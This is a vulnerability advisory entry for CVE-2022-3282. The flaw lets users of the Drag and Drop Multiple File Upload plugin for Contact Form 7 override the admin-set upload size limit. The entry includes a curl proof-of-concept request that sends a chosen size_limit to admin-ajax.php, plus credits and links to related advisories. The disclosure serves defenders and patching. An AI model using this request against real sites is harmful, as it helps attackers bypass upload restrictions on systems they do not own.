Drag and Drop Multiple File Upload < 1.3.6.5 – File Upload Size Limit Bypass | CVE 2022-3282 | Plugin Vulnerabilities

Description

The plugin does not properly check for the upload size limit set in forms, taking the value from user input sent when submitting the form. As a result, attackers could control the file length limit and bypass the limit set by admins in the contact form.

Proof of Concept

curl -X POST -F "size_limit=10485760" -F "action=dnd_codedropz_upload" -F "type=click" -F "form_id=156" -F "upload_name=upload-file-235" -F "upload-file=@upload.png"  https://example.com/wordpress/wp-admin/admin-ajax.php

Affects Plugins

drag-and-drop-multiple-file-upload-contact-form-7

Fixed in 1.3.6.5

References

CVE

Miscellaneous

Original Researcher

Sanjay Das

Submitter

Sanjay Das

Submitter website

https://p3n7a90n.github.io/

Submitter twitter

https://twitter.com/p3n7a90n

Verified

Yes

WPVDB ID

035dffef-4b4b-4afb-9776-7f6c5e56452c

Timeline

Publicly Published

2022-09-26 (about 1 years ago)

Added

2022-09-26 (about 1 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2015-09-15

Title

WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue

Published

2022-12-12

Title

WP Cerber < 9.3.3 - User Enumeration Bypass via Rest API

Published

2014-08-01

Title

Jetpack <= 2.9.2 - class.jetpack.php XML-RPC Access Control Bypass

Published

2021-01-20

Title

123ContactForm for WordPress <= 1.5.6 - Unauthenticated Arbitrary Post Creation

Published

2018-10-02

Title

Wordfence < 7.1.14 - Username Enumeration Prevention Bypass